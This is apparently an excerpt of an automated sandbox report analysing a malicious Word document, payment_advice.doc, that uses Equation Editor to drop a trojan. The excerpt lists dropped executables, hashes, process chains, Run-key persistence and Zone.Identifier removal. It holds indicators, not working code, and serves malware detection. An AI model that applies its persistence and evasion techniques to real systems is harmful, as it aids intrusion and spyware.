                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F856C
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F4D50
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B30E00
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B31788
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B31A69
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B30048
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B305B0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B30115
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B30006
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B31778
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4B4B0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B46898
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4C900
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4D108
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B46837
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4342F
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4E828
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B47467
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4684E
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B479A0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4F5E8
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4A1C0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4812F
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4711A
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B432E0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4764F
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4B788
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4FBF0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B4AF28
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C24D0
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C9828
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C914A
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C4A08
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C6A18
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C5620
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C9630
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C0B80
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C779A
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C07A8
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C9818
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C4D50
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C856C
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C86D1
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C1AEA
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C779A
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C1B61
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\twox67345.exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe D5582D586F46F61240CED5F4A44DAC22D5E2C7C0A48F63C964093DE0CBE49BC8
                      Source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$
                      Source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmpBinary or memory string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC
                      Source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmpBinary or memory string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@20/9@10/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$yment_advice.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC6A8.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ....................P."...........W.a.i.t.i.n.g. .f.o.r. .1.....................................0.................&.......................".....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. ...............&.....J.................".....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....t.......\.......T...............................e. ...............&.......................6s....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....t.......\.......T...............................e. ...............&.......................6s....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ......................!...........W.a.i.t.i.n.g. .f.o.r. .1.....$...............................................8.........................!.....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............8.......J.................!.....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....T.......h.......l...............................e. .............8..........................s....
                      Source: C:\Windows\SysWOW64\timeout.exeConsole Write: ..................................0.e.c.(.P.....T.......h.......l...............................e. .............8..........................s....
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: payment_advice.docReversingLabs: Detection: 43%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe 'C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess created: C:\Users\user\AppData\Roaming\twox67345.exe C:\Users\user\AppData\Roaming\twox67345.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeProcess created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: nVisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbisualBasic.pdbPe$ source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: ,micC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDBe source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: nLC:\Windows\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: oC:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.PDB, source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb3E96C492651E889CC13F1415EBB53FAC1131AE0BD333C5EE6021672D9718EA31A8AEBD0DA0072F25D87DBA6FC90FFD598ED4DA35E44C398C454307E8E33B8426143DAEC source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp
                      Source: Binary string: \REGISTRY\USER\S-1-5-21-966771315-3019405637-367336477-1006_Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4UGxXf.PDB424491E3931}\Servererver32 source: UGxXf.exe, 0000000B.00000002.2329057771.00000000002C7000.00000004.00000010.sdmp
                      Source: Binary string: :\Windows\mscorlib.pdbpdblib.pdb source: UGxXf.exe, 0000000B.00000002.2329868830.00000000006EA000.00000004.00000020.sdmp
                      Source: Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UGxXf.exe, 0000000B.00000002.2341228895.00000000054D1000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00614823 push ebp; ret
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_006139E0 pushad ; ret
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00612DFE push ebp; ret
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_00613FD9 pushfd ; retf
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023F6FBD push 8BFFFFFDh; retf
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeCode function: 9_2_023FA5A8 pushfd ; ret
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B44823 push ebp; ret
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B42DFE push ebp; ret
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_00B43FD9 pushfd ; retf
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeCode function: 16_2_048C6FB7 push 8BFFFFFDh; retf
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\twox67345.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile created: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\twox[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYWJump to behavior
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZozjABYWJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeFile opened: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exeFile opened: C:\Users\user\AppData\Roaming\wPLpKMo\UGxXf.exe:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\twox67345.exeProcess information set: NOOPENFILEERRORBOX
